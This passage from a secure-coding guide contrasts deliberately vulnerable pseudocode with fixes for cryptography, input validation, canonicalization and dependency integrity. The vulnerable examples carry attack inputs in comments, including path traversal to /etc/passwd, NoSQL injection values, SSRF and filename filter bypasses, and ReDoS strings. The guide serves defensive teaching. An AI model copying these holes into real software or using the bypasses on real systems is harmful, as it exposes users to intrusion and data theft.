FUNCTION + +// Problems: +// - MD5: Collisions found in seconds, rainbow tables widely available +// - SHA-1: Collision attacks demonstrated (SHAttered, 2017) +// - DES: Brute-forceable in hours with modern hardware + +// ======================================== +// GOOD: Modern cryptographic algorithms +// ======================================== +FUNCTION hash_password_secure(password): + // Use bcrypt, Argon2, or scrypt for passwords + salt = bcrypt.generate_salt(rounds=12) + RETURN bcrypt.hash(password, salt) +END FUNCTION + +FUNCTION verify_integrity_secure(data): + // Use SHA-256, SHA-3, or BLAKE2 for integrity + RETURN sha256(data) +END FUNCTION + +FUNCTION encrypt_data_secure(plaintext, key): + // Use AES-256-GCM or ChaCha20-Poly1305 + nonce = crypto.secure_random_bytes(12) + cipher = AES_GCM.new(key, nonce) + ciphertext, tag = cipher.encrypt_and_digest(plaintext) + RETURN nonce + tag + ciphertext // Include nonce and auth tag +END FUNCTION + +// Algorithm selection guide: +// - Password hashing: bcrypt, Argon2id, scrypt (NOT SHA-256 alone) +// - Symmetric encryption: AES-256-GCM, ChaCha20-Poly1305 +// - Integrity/checksums: SHA-256, SHA-3, BLAKE2 +// - Signatures: Ed25519, ECDSA with P-256, RSA-2048+ +``` + +### 5.2 Hardcoded Encryption Keys + +``` +// PSEUDOCODE - Implement in your target language + +// ======================================== +// BAD: Hardcoded encryption keys in source +// ======================================== +CONSTANT ENCRYPTION_KEY = "MySecretKey12345" // Committed to repo! +CONSTANT AES_KEY = bytes([0x2b, 0x7e, 0x15, 0x16, ...]) // Still hardcoded + +FUNCTION encrypt_user_data(data): + cipher = AES.new(ENCRYPTION_KEY, mode=GCM) + RETURN cipher.encrypt(data) +END FUNCTION + +// Problems: +// - Keys in version control are exposed forever +// - Cannot rotate keys without code changes +// - All environments share same key + +// ======================================== +// GOOD: External key management +// ======================================== +FUNCTION get_encryption_key(): + // Option 1: Environment variable + key = environment.get("ENCRYPTION_KEY") + + IF key IS NULL: + THROW Error("ENCRYPTION_KEY environment variable required") + END IF + + // Validate key length for AES-256 + key_bytes = base64_decode(key) + IF key_bytes.length != 32: + THROW Error("ENCRYPTION_KEY must be 256 bits") + END IF + + RETURN key_bytes +END FUNCTION + +FUNCTION encrypt_user_data(data): + key = get_encryption_key() + nonce = crypto.secure_random_bytes(12) + cipher = AES_GCM.new(key, nonce) + ciphertext, tag = cipher.encrypt_and_digest(data) + RETURN nonce + tag + ciphertext +END FUNCTION + +// Better: Use a secret manager for production +FUNCTION get_encryption_key_from_manager(): + TRY: + // AWS Secrets Manager, HashiCorp Vault, Azure Key Vault, etc. + secret = secret_manager.get_secret("encryption-key") + RETURN base64_decode(secret.value) + CATCH Error as e: + log.error("Failed to retrieve encryption key", {error: e.message}) + THROW Error("Encryption key unavailable") + END TRY +END FUNCTION +``` + +### 5.3 ECB Mode Usage + +``` +// PSEUDOCODE - Implement in your target language + +// ======================================== +// BAD: ECB mode reveals patterns in data +// ======================================== +FUNCTION encrypt_ecb(plaintext, key): + // Vulnerable: ECB encrypts identical blocks identically + cipher = AES.new(key, mode=ECB) + RETURN cipher.encrypt(pad(plaintext)) +END FUNCTION + +// Problem demonstration: +// Encrypting an image with ECB mode preserves visual patterns +// because identical 16-byte blocks produce identical ciphertext +// This reveals structure of the original data! + +// Identical plaintexts produce identical ciphertexts: +// plaintext_block_1 = "AAAAAAAAAAAAAAAA" +// plaintext_block_2 = "AAAAAAAAAAAAAAAA" +// ciphertext_1 == ciphertext_2 // Information leaked! + +// ======================================== +// GOOD: Use authenticated encryption modes +// ======================================== +FUNCTION encrypt_gcm(plaintext, key): + // GCM mode: Each encryption is unique even for same plaintext + nonce = crypto.secure_random_bytes(12) // 96-bit nonce for GCM + + cipher = AES_GCM.new(key, nonce) + ciphertext, auth_tag = cipher.encrypt_and_digest(plaintext) + + // Return nonce + tag + ciphertext (all needed for decryption) + RETURN nonce + auth_tag + ciphertext +END FUNCTION + +FUNCTION decrypt_gcm(encrypted_data, key): + // Extract components + nonce = encrypted_data[0:12] + auth_tag = encrypted_data[12:28] + ciphertext = encrypted_data[28:] + + cipher = AES_GCM.new(key, nonce) + + TRY: + plaintext = cipher.decrypt_and_verify(ciphertext, auth_tag) + RETURN plaintext + CATCH AuthenticationError: + // Tampering detected! + log.warning("Decryption failed: authentication tag mismatch") + THROW Error("Data integrity check failed") + END TRY +END FUNCTION + +// Alternative: CBC mode (if GCM not available) +FUNCTION encrypt_cbc(plaintext, key): + // CBC requires random IV for each encryption + iv = crypto.secure_random_bytes(16) + + cipher = AES_CBC.new(key, iv) + padded = pkcs7_pad(plaintext, block_size=16) + ciphertext = cipher.encrypt(padded) + + // Must also add HMAC for authentication (encrypt-then-MAC) + mac = hmac_sha256(key, iv + ciphertext) + + RETURN iv + ciphertext + mac +END FUNCTION +``` + +### 5.4 Missing or Weak IVs/Nonces + +``` +// PSEUDOCODE - Implement in your target language + +// ======================================== +// BAD: Predictable or reused IVs/nonces +// ======================================== +FUNCTION encrypt_static_iv(plaintext, key): + // Vulnerable: Static IV - identical plaintexts have identical ciphertexts + iv = bytes([0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]) + cipher = AES_CBC.new(key, iv) + RETURN cipher.encrypt(pad(plaintext)) +END FUNCTION + +FUNCTION encrypt_counter_nonce(plaintext, key, message_counter): + // Vulnerable: Predictable counter-based nonce + nonce = int_to_bytes(message_counter, length=12) + cipher = AES_GCM.new(key, nonce) + RETURN cipher.encrypt(plaintext) +END FUNCTION + +FUNCTION encrypt_truncated_nonce(plaintext, key): + // Vulnerable: Nonce too short + nonce = crypto.secure_random_bytes(4) // Only 32 bits! + cipher = AES_GCM.new(key, nonce) + RETURN cipher.encrypt(plaintext) +END FUNCTION + +// Problems: +// - Static IV: Same plaintext → same ciphertext (pattern leakage) +// - Predictable nonce: Allows chosen-plaintext attacks +// - Short nonce: Birthday collision after ~2^16 messages +// - GCM with repeated nonce: CATASTROPHIC - authentication key recovered! + +// ======================================== +// GOOD: Cryptographically random IVs/nonces +// ======================================== +FUNCTION encrypt_with_random_iv(plaintext, key): + // Generate random IV for each encryption + iv = crypto.secure_random_bytes(16) // 128 bits for AES-CBC + + cipher = AES_CBC.new(key, iv) + padded = pkcs7_pad(plaintext, block_size=16) + ciphertext = cipher.encrypt(padded) + + // Prepend IV (it's not secret, just must be unique) + RETURN iv + ciphertext +END FUNCTION + +FUNCTION encrypt_with_random_nonce(plaintext, key): + // Generate random nonce for each encryption + nonce = crypto.secure_random_bytes(12) // 96 bits for AES-GCM + + cipher = AES_GCM.new(key, nonce) + ciphertext, tag = cipher.encrypt_and_digest(plaintext) + + RETURN nonce + tag + ciphertext +END FUNCTION + +// For high-volume encryption: Use key+nonce management +FUNCTION encrypt_with_derived_nonce(plaintext, key, message_id): + // Derive unique nonce from random key-specific prefix + message ID + // This prevents nonce reuse across different encryption contexts + + nonce_key = derive_key(key, "nonce-derivation") + nonce = hmac_sha256(nonce_key, message_id)[0:12] + + cipher = AES_GCM.new(key, nonce) + ciphertext, tag = cipher.encrypt_and_digest(plaintext) + + RETURN message_id + tag + ciphertext // Include message_id for decryption +END FUNCTION +``` + +### 5.5 Rolling Your Own Crypto + +``` +// PSEUDOCODE - Implement in your target language + +// ======================================== +// BAD: Custom cryptographic implementations +// ======================================== +FUNCTION my_encrypt(plaintext, key): + // Vulnerable: XOR "encryption" is trivially broken + result = "" + FOR i = 0 TO plaintext.length - 1: + result += char(plaintext[i] XOR key[i % key.length]) + END FOR + RETURN result +END FUNCTION + +FUNCTION my_hash(data): + // Vulnerable: Custom hash is not collision-resistant + result = 0 + FOR byte IN data: + result = (result * 31 + byte) % 2147483647 + END FOR + RETURN result +END FUNCTION + +FUNCTION my_random(seed): + // Vulnerable: Linear congruential generator + RETURN (seed * 1103515245 + 12345) % (2^31) +END FUNCTION + +// Problems: +// - XOR cipher: Trivially broken with known-plaintext +// - Custom hash: Collisions easily found +// - LCG random: Completely predictable sequence + +// ======================================== +// GOOD: Use established cryptographic libraries +// ======================================== +FUNCTION encrypt_properly(plaintext, key): + // Use vetted library implementations + // Python: cryptography library + // Node.js: crypto module + // Java: javax.crypto + // Go: crypto/* packages + + // AES-GCM from standard library + nonce = crypto.secure_random_bytes(12) + cipher = crypto.createCipheriv("aes-256-gcm", key, nonce) + + ciphertext = cipher.update(plaintext) + cipher.final() + auth_tag = cipher.getAuthTag() + + RETURN nonce + auth_tag + ciphertext +END FUNCTION + +FUNCTION hash_properly(data): + // Use standard library hash functions + RETURN crypto.sha256(data) +END FUNCTION + +FUNCTION random_properly(num_bytes): + // Use OS-provided cryptographic randomness + RETURN crypto.secure_random_bytes(num_bytes) +END FUNCTION + +// Rule: Never implement cryptographic primitives yourself +// - Encryption: Use library AES-GCM, ChaCha20-Poly1305 +// - Hashing: Use library SHA-256, SHA-3, BLAKE2 +// - Signatures: Use library Ed25519, ECDSA +// - Random: Use library secrets module or os.urandom +``` + +### 5.6 Insecure Random Number Generation + +``` +// PSEUDOCODE - Implement in your target language + +// ======================================== +// BAD: Non-cryptographic RNG for security +// ======================================== +FUNCTION generate_session_id_weak(): + // Vulnerable: Math.random() / random.random() is predictable + RETURN random.randint(0, 999999999) +END FUNCTION + +FUNCTION generate_token_weak(): + // Vulnerable: Using random module for security tokens + chars = "abcdefghijklmnopqrstuvwxyz0123456789" + token = "" + FOR i = 0 TO 32: + token += chars[random.randint(0, chars.length - 1)] + END FOR + RETURN token +END FUNCTION + +FUNCTION generate_key_weak(): + // Vulnerable: Time-based seeding + random.seed(current_timestamp()) + key = random.randbytes(32) + RETURN key +END FUNCTION + +// Problems: +// - Math.random(): Uses predictable PRNG (Mersenne Twister) +// - Time seed: Attacker can guess seed from approximate time +// - Internal state: Can be recovered from ~624 outputs + +// ======================================== +// GOOD: Cryptographically secure randomness +// ======================================== +FUNCTION generate_session_id_secure(): + // Use cryptographically secure random + RETURN secrets.token_urlsafe(32) // 256 bits of entropy +END FUNCTION + +FUNCTION generate_token_secure(): + // Use secrets module (Python) or crypto.randomBytes (Node) + RETURN secrets.token_hex(32) // 256 bits as hex string +END FUNCTION + +FUNCTION generate_key_secure(): + // Use OS entropy source + RETURN os.urandom(32) // 256 bits from /dev/urandom or equivalent +END FUNCTION + +FUNCTION generate_password_secure(length): + // Secure password generation + alphabet = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#$%^&*" + password = "" + FOR i = 0 TO length - 1: + password += alphabet[secrets.randbelow(alphabet.length)] + END FOR + RETURN password +END FUNCTION + +// Language-specific secure random: +// Python: secrets module, os.urandom +// Node.js: crypto.randomBytes, crypto.randomUUID +// Java: SecureRandom +// Go: crypto/rand +// Ruby: SecureRandom +// PHP: random_bytes, random_int +``` + +### 5.7 Improper Key Derivation + +``` +// PSEUDOCODE - Implement in your target language + +// ======================================== +// BAD: Weak key derivation methods +// ======================================== +FUNCTION derive_key_weak(password): + // Vulnerable: Direct hash of password + RETURN sha256(password) +END FUNCTION + +FUNCTION derive_key_truncated(password): + // Vulnerable: Password truncation + RETURN password.bytes()[0:32] // Loses entropy! +END FUNCTION + +FUNCTION derive_key_md5(password, salt): + // Vulnerable: MD5 with low iteration count + RETURN md5(salt + password) +END FUNCTION + +FUNCTION derive_key_fast(password, salt): + // Vulnerable: Single SHA iteration (too fast to brute-force resist) + RETURN sha256(salt + password) +END FUNCTION + +// Problems: +// - Direct hash: No salt, no iterations, vulnerable to rainbow tables +// - Truncation: Reduces entropy, predictable patterns +// - Fast hash: GPU can compute billions per second + +// ======================================== +// GOOD: Proper key derivation functions +// ======================================== +FUNCTION derive_key_pbkdf2(password, salt): + // PBKDF2 with high iteration count + IF salt IS NULL: + salt = crypto.secure_random_bytes(32) + END IF + + key = pbkdf2_hmac( + hash_name="sha256", + password=password.encode(), + salt=salt, + iterations=600000, // OWASP recommends 600,000+ for SHA-256 + key_length=32 + ) + RETURN {key: key, salt: salt} +END FUNCTION + +FUNCTION derive_key_argon2(password, salt): + // Argon2id - memory-hard, recommended for passwords + IF salt IS NULL: + salt = crypto.secure_random_bytes(16) + END IF + + key = argon2id.hash( + password=password, + salt=salt, + time_cost=3, // Iterations + memory_cost=65536, // 64MB memory + parallelism=4, // 4 threads + hash_len=32 // Output length + ) + RETURN {key: key, salt: salt} +END FUNCTION + +FUNCTION derive_key_scrypt(password, salt): + // scrypt - memory-hard alternative + IF salt IS NULL: + salt = crypto.secure_random_bytes(32) + END IF + + key = scrypt( + password=password.encode(), + salt=salt, + n=2^17, // CPU/memory cost (131072) + r=8, // Block size + p=1, // Parallelism + key_length=32 + ) + RETURN {key: key, salt: salt} +END FUNCTION + +// For deriving multiple keys from one password +FUNCTION derive_multiple_keys(password, salt): + // Use HKDF to derive multiple keys from master key + master_key = derive_key_argon2(password, salt).key + + encryption_key = hkdf_expand( + master_key, + info="encryption", + length=32 + ) + + mac_key = hkdf_expand( + master_key, + info="mac", + length=32 + ) + + RETURN { + encryption_key: encryption_key, + mac_key: mac_key + } +END FUNCTION +``` + +--- + +## 6. Input Validation + +**CWE References:** CWE-20 (Improper Input Validation), CWE-1284 (Improper Validation of Specified Quantity in Input), CWE-1333 (Inefficient Regular Expression Complexity), CWE-22 (Path Traversal), CWE-180 (Incorrect Behavior Order: Validate Before Canonicalize) +**Severity:** High | **Related:** [[Input-Validation]] + +> **Risk:** Input validation failures are a foundational vulnerability enabling most other attack classes. AI-generated code frequently relies solely on client-side validation (trivially bypassed) or omits validation entirely. Missing length limits enable DoS attacks, improper type checking allows type confusion attacks, and ReDoS patterns can freeze services. All user input must be validated on the server with type, length, format, and range constraints. + +### 6.1 Missing Server-Side Validation (Client-Only) + +``` +// PSEUDOCODE - Implement in your target language + +// ======================================== +// BAD: Client-side only validation +// ======================================== +// Frontend JavaScript +FUNCTION validate_form_client_only(): + email = document.getElementById("email").value + age = document.getElementById("age").value + + IF NOT email.includes("@"): + show_error("Invalid email") + RETURN FALSE + END IF + + IF age < 0 OR age > 150: + show_error("Invalid age") + RETURN FALSE + END IF + + // Form submits if client-side validation passes + form.submit() +END FUNCTION + +// Backend - NO validation! +FUNCTION create_user(request): + // Vulnerable: Trusts client-side validation completely + email = request.body.email + age = request.body.age + + database.insert("users", {email: email, age: age}) + RETURN {success: TRUE} +END FUNCTION + +// Attack: Attacker bypasses JavaScript with direct HTTP request +// curl -X POST /api/users -d '{"email":"not-an-email","age":-999}' +// Result: Invalid data stored in database + +// ======================================== +// GOOD: Server-side validation (client-side is UX only) +// ======================================== +// Backend - validates everything +FUNCTION create_user(request): + // Validate all input server-side + validation_errors = [] + + // Email validation + email = request.body.email + IF typeof(email) != "string": + validation_errors.append("Email must be a string") + ELSE IF NOT regex.match("^[^@]+@[^@]+\.[^@]+$", email): + validation_errors.append("Invalid email format") + ELSE IF email.length > 254: + validation_errors.append("Email too long") + END IF + + // Age validation + age = request.body.age + IF typeof(age) != "number" OR NOT is_integer(age): + validation_errors.append("Age must be an integer") + ELSE IF age < 0 OR age > 150: + validation_errors.append("Age must be between 0 and 150") + END IF + + IF validation_errors.length > 0: + RETURN {success: FALSE, errors: validation_errors} + END IF + + // Safe to process validated data + database.insert("users", {email: email, age: age}) + RETURN {success: TRUE} +END FUNCTION + +// Client-side validation is still useful for UX (immediate feedback) +// but NEVER rely on it for security +``` + +### 6.2 Improper Type Checking + +``` +// PSEUDOCODE - Implement in your target language + +// ======================================== +// BAD: Missing or weak type validation +// ======================================== +FUNCTION process_payment_weak(request): + amount = request.body.amount + quantity = request.body.quantity + + // Vulnerable: No type checking + total = amount * quantity + + // What if amount = "100" (string)? JavaScript: "100" * 2 = 200 (coerced) + // What if amount = [100]? Some languages coerce arrays unexpectedly + // What if quantity = {"$gt": 0}? NoSQL injection possible + + charge_card(user, total) +END FUNCTION + +FUNCTION get_user_weak(request): + user_id = request.params.id + + // Vulnerable: ID could be array, object, or unexpected type + // MongoDB: ?id[$ne]=null returns all users! + RETURN database.find_one({id: user_id}) +END FUNCTION + +FUNCTION calculate_discount_weak(price, discount_percent): + // Vulnerable: No validation of numeric types + // discount_percent = "50" → string concatenation in some languages + // discount_percent = NaN → NaN propagates through calculations + final_price = price - (price * discount_percent / 100) + RETURN final_price +END FUNCTION + +// ======================================== +// GOOD: Strict type validation +// ======================================== +FUNCTION process_payment_safe(request): + // Validate amount + amount = request.body.amount + IF typeof(amount) != "number": + THROW ValidationError("Amount must be a number") + END IF + IF NOT is_finite(amount) OR is_nan(amount): + THROW ValidationError("Amount must be a valid number") + END IF + IF amount <= 0: + THROW ValidationError("Amount must be positive") + END IF + + // Validate quantity + quantity = request.body.quantity + IF typeof(quantity) != "number" OR NOT is_integer(quantity): + THROW ValidationError("Quantity must be an integer") + END IF + IF quantity <= 0 OR quantity > 1000: + THROW ValidationError("Quantity must be between 1 and 1000") + END IF + + // Safe to calculate + total = amount * quantity + + // Additional: Prevent floating point issues with currency + total_cents = round(total * 100) // Work in cents + charge_card(user, total_cents) +END FUNCTION + +FUNCTION get_user_safe(request): + user_id = request.params.id + + // Strict type checking + IF typeof(user_id) != "string": + THROW ValidationError("User ID must be a string") + END IF + + // Format validation (e.g., UUID) + IF NOT is_valid_uuid(user_id): + THROW ValidationError("Invalid user ID format") + END IF + + RETURN database.find_one({id: user_id}) +END FUNCTION + +// Type coercion helper with explicit validation +FUNCTION parse_integer_strict(value, min, max): + IF typeof(value) == "number": + IF NOT is_integer(value): + THROW ValidationError("Expected integer, got float") + END IF + result = value + ELSE IF typeof(value) == "string": + IF NOT regex.match("^-?[0-9]+$", value): + THROW ValidationError("Invalid integer format") + END IF + result = parse_int(value) + ELSE: + THROW ValidationError("Expected number or numeric string") + END IF + + IF result < min OR result > max: + THROW ValidationError("Value out of range: " + min + " to " + max) + END IF + + RETURN result +END FUNCTION +``` + +### 6.3 Missing Length Limits + +``` +// PSEUDOCODE - Implement in your target language + +// ======================================== +// BAD: No length limits on input +// ======================================== +FUNCTION create_post_unlimited(request): + title = request.body.title + content = request.body.content + + // Vulnerable: No length limits + // Attacker sends 1GB title, exhausts memory/storage + database.insert("posts", {title: title, content: content}) +END FUNCTION + +FUNCTION search_unlimited(request): + query = request.params.q + + // Vulnerable: Long query strings can DoS search systems + // Also enables ReDoS if query is used in regex + results = database.search(query) + RETURN results +END FUNCTION + +FUNCTION process_file_unlimited(request): + file_content = request.body.file + + // Vulnerable: No file size limit + // Attacker uploads 10GB file, exhausts disk/memory + save_file(file_content) +END FUNCTION + +// Real-world DoS: JSON payload with deeply nested objects +// {"a":{"a":{"a":{"a":...}}}} // 1000 levels deep +// Can crash parsers or exhaust stack space + +// ======================================== +// GOOD: Enforce length limits on all inputs +// ======================================== +CONSTANT MAX_TITLE_LENGTH = 200 +CONSTANT MAX_CONTENT_LENGTH = 50000 +CONSTANT MAX_SEARCH_QUERY = 500 +CONSTANT MAX_FILE_SIZE = 10 * 1024 * 1024 // 10MB +CONSTANT MAX_JSON_DEPTH = 20 + +FUNCTION create_post_limited(request): + title = request.body.title + content = request.body.content + + // Validate title length + IF typeof(title) != "string": + THROW ValidationError("Title must be a string") + END IF + IF title.length == 0: + THROW ValidationError("Title is required") + END IF + IF title.length > MAX_TITLE_LENGTH: + THROW ValidationError("Title exceeds " + MAX_TITLE_LENGTH + " characters") + END IF + + // Validate content length + IF typeof(content) != "string": + THROW ValidationError("Content must be a string") + END IF + IF content.length > MAX_CONTENT_LENGTH: + THROW ValidationError("Content exceeds " + MAX_CONTENT_LENGTH + " characters") + END IF + + database.insert("posts", {title: title, content: content}) +END FUNCTION + +FUNCTION search_limited(request): + query = request.params.q + + IF typeof(query) != "string": + THROW ValidationError("Query must be a string") + END IF + IF query.length > MAX_SEARCH_QUERY: + THROW ValidationError("Search query too long") + END IF + IF query.length < 2: + THROW ValidationError("Search query too short") + END IF + + results = database.search(query) + RETURN results +END FUNCTION + +// Configure request body limits at framework level +FUNCTION configure_server(): + server.set_body_limit(MAX_FILE_SIZE) + server.set_json_depth_limit(MAX_JSON_DEPTH) + server.set_parameter_limit(1000) // Max form fields + server.set_header_size_limit(8192) // 8KB header limit +END FUNCTION + +// Array length limits +FUNCTION process_batch_request(request): + items = request.body.items + + IF NOT is_array(items): + THROW ValidationError("Items must be an array") + END IF + IF items.length > 100: + THROW ValidationError("Maximum 100 items per batch") + END IF + + FOR item IN items: + process_single_item(item) + END FOR +END FUNCTION +``` + +### 6.4 Regex Denial of Service (ReDoS) + +``` +// PSEUDOCODE - Implement in your target language + +// ======================================== +// BAD: Vulnerable regex patterns +// ======================================== +FUNCTION validate_email_redos(email): + // Vulnerable: Catastrophic backtracking on malformed input + // Pattern with nested quantifiers + pattern = "^([a-zA-Z0-9]+)+@[a-zA-Z0-9]+\.[a-zA-Z]+$" + + // Attack input: "aaaaaaaaaaaaaaaaaaaaaaaaaaaa!" + // Regex engine tries exponential combinations before failing + RETURN regex.match(pattern, email) +END FUNCTION + +FUNCTION validate_url_redos(url): + // Vulnerable: Multiple overlapping groups + pattern = "^(https?://)?(www\.)?([a-zA-Z0-9-]+\.)+[a-zA-Z]{2,}(/.*)*$" + + // Attack input: "http://aaaaaaaaaaaaaaaaaaaaaaaa" + RETURN regex.match(pattern, url) +END FUNCTION + +FUNCTION search_with_regex(user_pattern, content): + // Vulnerable: User-controlled regex pattern + // Attacker provides: "(a+)+$" with input "aaaaaaaaaaaaaaaaaaaX" + RETURN regex.search(user_pattern, content) +END FUNCTION + +// ReDoS patterns to avoid: +// - Nested quantifiers: (a+)+, (a*)* +// - Overlapping alternatives: (a|a)+, (a|ab)+ +// - Quantified groups with repetition: (a+b+)+ + +// ======================================== +// GOOD: Safe regex patterns and practices +// ======================================== +FUNCTION validate_email_safe(email): + // First: Length check before regex + IF email.length > 254: + RETURN FALSE + END IF + + // Use atomic groups or possessive quantifiers if available + // Or use simpler, non-backtracking patterns + pattern = "^[^@\s]+@[^@\s]+\.[^@\s]+$" // Simple, no backtracking risk + + RETURN regex.match(pattern, email) +END FUNCTION + +FUNCTION validate_email_best(email): + // Best: Use a validated library + TRY: + validated = email_validator.validate(email) + RETURN TRUE + CATCH ValidationError: + RETURN FALSE + END TRY +END FUNCTION + +FUNCTION validate_url_safe(url): + // Length limit first + IF url.length > 2048: + RETURN FALSE + END IF + + // Use URL parser instead of regex + TRY: + parsed = url_parser.parse(url) + RETURN parsed.host IS NOT NULL AND parsed.protocol IN ["http:", "https:"] + CATCH ParseError: + RETURN FALSE + END TRY +END FUNCTION + +FUNCTION search_with_safe_pattern(user_input, content): + // Never use user input directly as regex + // Escape special characters if literal match needed + escaped_input = regex.escape(user_input) + + // Set timeout on regex operations + RETURN regex.search(escaped_input, content, timeout=1000) // 1 second max +END FUNCTION + +// Use RE2 or similar guaranteed-linear-time regex engine +FUNCTION search_with_re2(pattern, content): + // RE2 rejects patterns that could cause exponential backtracking + TRY: + compiled = re2.compile(pattern) + RETURN compiled.search(content) + CATCH UnsupportedPatternError: + // Pattern rejected due to backtracking risk + THROW ValidationError("Invalid search pattern") + END TRY +END FUNCTION + +// Safe pattern testing +FUNCTION is_safe_regex(pattern): + // Detect common ReDoS patterns + dangerous_patterns = [ + "\\(.+\\)+\\+", // (x+)+ + "\\(.+\\)\\*\\+", // (x*)+ + "\\(.+\\)+\\*", // (x+)* + "\\(.+\\|.+\\)+" // (a|b)+ + ] + + FOR dangerous IN dangerous_patterns: + IF regex.search(dangerous, pattern): + RETURN FALSE + END IF + END FOR + + RETURN TRUE +END FUNCTION +``` + +### 6.5 Accepting and Processing Untrusted Data + +``` +// PSEUDOCODE - Implement in your target language + +// ======================================== +// BAD: Trusting external data sources +// ======================================== +FUNCTION process_webhook_unsafe(request): + // Vulnerable: No signature verification + data = json.parse(request.body) + + // Attacker can spoof webhook requests + IF data.event == "payment_completed": + mark_order_paid(data.order_id) // Dangerous! + END IF +END FUNCTION + +FUNCTION fetch_and_process_unsafe(url): + // Vulnerable: Processing arbitrary external content + response = http.get(url) + data = json.parse(response.body) + + // No validation of response structure + database.insert("external_data", data) +END FUNCTION + +FUNCTION deserialize_unsafe(serialized_data): + // Vulnerable: Pickle/eval deserialization of untrusted data + // Allows arbitrary code execution! + object = pickle.loads(serialized_data) + RETURN object +END FUNCTION + +FUNCTION process_xml_unsafe(xml_string): + // Vulnerable: XXE (XML External Entity) attack + parser = xml.create_parser() + doc = parser.parse(xml_string) + // Attacker XML: + RETURN doc +END FUNCTION + +// ======================================== +// GOOD: Validate and sanitize external data +// ======================================== +FUNCTION process_webhook_safe(request): + // Verify webhook signature + signature = request.headers.get("X-Signature") + expected = hmac_sha256(WEBHOOK_SECRET, request.raw_body) + + IF NOT constant_time_compare(signature, expected): + log.warning("Invalid webhook signature", {ip: request.ip}) + RETURN {status: 401, error: "Invalid signature"} + END IF + + // Validate payload structure + data = json.parse(request.body) + + IF NOT validate_webhook_schema(data): + RETURN {status: 400, error: "Invalid payload"} + END IF + + // Process verified and validated data + IF data.event == "payment_completed": + // Additional verification: Check with payment provider + IF verify_payment_with_provider(data.payment_id): + mark_order_paid(data.order_id) + END IF + END IF +END FUNCTION + +FUNCTION fetch_and_process_safe(url): + // Validate URL is from allowed sources + parsed_url = url_parser.parse(url) + IF parsed_url.host NOT IN ALLOWED_HOSTS: + THROW ValidationError("URL host not allowed") + END IF + + // Fetch with timeout and size limits + response = http.get(url, timeout=10, max_size=1024*1024) + + // Parse and validate structure + TRY: + data = json.parse(response.body) + CATCH JSONError: + THROW ValidationError("Invalid JSON response") + END TRY + + // Validate against expected schema + validated_data = validate_schema(data, EXPECTED_SCHEMA) + + // Sanitize before storing + sanitized = sanitize_object(validated_data) + database.insert("external_data", sanitized) +END FUNCTION + +FUNCTION deserialize_safe(data, format): + // Never use pickle/eval for untrusted data + // Use safe serialization formats + IF format == "json": + RETURN json.parse(data) + ELSE IF format == "msgpack": + RETURN msgpack.unpack(data) + ELSE: + THROW Error("Unsupported format") + END IF +END FUNCTION + +FUNCTION process_xml_safe(xml_string): + // Disable external entities and DTDs + parser = xml.create_parser( + resolve_entities=FALSE, + load_dtd=FALSE, + no_network=TRUE + ) + + TRY: + doc = parser.parse(xml_string) + RETURN doc + CATCH XMLError as e: + log.warning("XML parsing failed", {error: e.message}) + THROW ValidationError("Invalid XML") + END TRY +END FUNCTION + +// Schema validation helper +FUNCTION validate_schema(data, schema): + // Use JSON Schema or similar validation library + validator = JsonSchemaValidator(schema) + + IF NOT validator.is_valid(data): + errors = validator.get_errors() + THROW ValidationError("Schema validation failed: " + errors.join(", ")) + END IF + + RETURN data +END FUNCTION +``` + +### 6.6 Missing Canonicalization + +``` +// PSEUDOCODE - Implement in your target language + +// ======================================== +// BAD: Validation without canonicalization +// ======================================== +FUNCTION check_path_unsafe(requested_path): + // Vulnerable: Path not canonicalized before validation + IF requested_path.starts_with("/uploads/"): + // Bypass: "../../../etc/passwd" doesn't start with /uploads/ + // But resolves to outside the directory! + RETURN read_file(requested_path) + END IF + THROW AccessDenied("Invalid path") +END FUNCTION + +FUNCTION check_url_unsafe(url): + // Vulnerable: URL manipulation bypasses check + // Blocked: "http://internal-server" + // Bypass: "http://internal-server%00.example.com" + // Bypass: "http://0x7f000001" (127.0.0.1 in hex) + // Bypass: "http://localhost" vs "http://LOCALHOST" vs "http://127.0.0.1" + + IF url.contains("internal-server"): + THROW AccessDenied("Internal URLs not allowed") + END IF + + RETURN http.get(url) +END FUNCTION + +FUNCTION validate_filename_unsafe(filename): + // Vulnerable: Unicode normalization bypass + // Blocked: "config.php" + // Bypass: "config.php" with full-width characters (config.php) + // Bypass: "config.php\x00.txt" (null byte injection) + + IF filename.ends_with(".php"): + THROW AccessDenied("PHP files not allowed") + END IF + + save_file(filename) +END FUNCTION + +FUNCTION check_html_unsafe(content): + // Vulnerable: Case-sensitive blacklist + // Blocked: " + +// Downloading without verification +FUNCTION download_dependency(url): + content = http.get(url) + write_file("lib/dependency.js", content) + // No verification that content is what we expected +END FUNCTION + +// Package install without lockfile integrity +FUNCTION install(): + run_command("npm install") // Uses ^ ranges, no integrity check +END FUNCTION + +// Build process pulling from remote without checks +FUNCTION build(): + // Downloading build tools without verification + download("https://build-tools.example.com/compiler.tar.gz") + extract("compiler.tar.gz") + execute("./compiler/build") // Running unverified code +END FUNCTION + +// ======================================== +// GOOD: Verify integrity at every step +// ======================================== + +// HTML with Subresource Integrity (SRI) + + +// Download with hash verification +FUNCTION download_verified(url, expected_hash): + content = http.get(url) + + // Calculate hash of downloaded content + actual_hash = crypto.sha384(content) + + IF actual_hash != expected_hash: + log.error("Integrity check failed", { + url: url, + expected: expected_hash, + actual: actual_hash + }) + THROW SecurityError("Downloaded file failed integrity check") + END IF + + RETURN content +END FUNCTION + +FUNCTION download_dependency(url, expected_hash): + content = download_verified(url, expected_hash) + write_file("lib/dependency.js", content) + log.info("Dependency installed with verified integrity", {url: url}) +END FUNCTION + +// Package lockfile with integrity hashes +// package-lock.json includes: +{ + "lodash": { + "version": "4.17.21", + "resolved": "https://registry.npmjs.org/lodash/-/lodash-4.17.21.tgz", + "integrity": "sha512-v2kDE0cyTsc..." // Verified on install + } +} + +// Strict install from lockfile +FUNCTION install_with_integrity(): + // npm ci verifies integrity hashes from lockfile + result = run_command("npm ci") + + IF NOT result.success: + THROW Error("Installation failed integrity verification") + END IF +END FUNCTION + +// Build reproducibility with verified tools +FUNCTION secure_build(): + // Pin and verify all build tool versions + tools = { + "node": {version: "20.10.0", hash: "sha256:abc123..."}, + "npm": {version: "10.2.3", hash: "sha256:def456..."}, + "compiler": {version: "1.2.3", hash: "sha256:ghi789..."} + } + + FOR tool_name, tool_spec IN tools: + // Verify tool binary integrity before use + actual_hash = hash_file(get_tool_path(tool_name)) + + IF actual_hash != 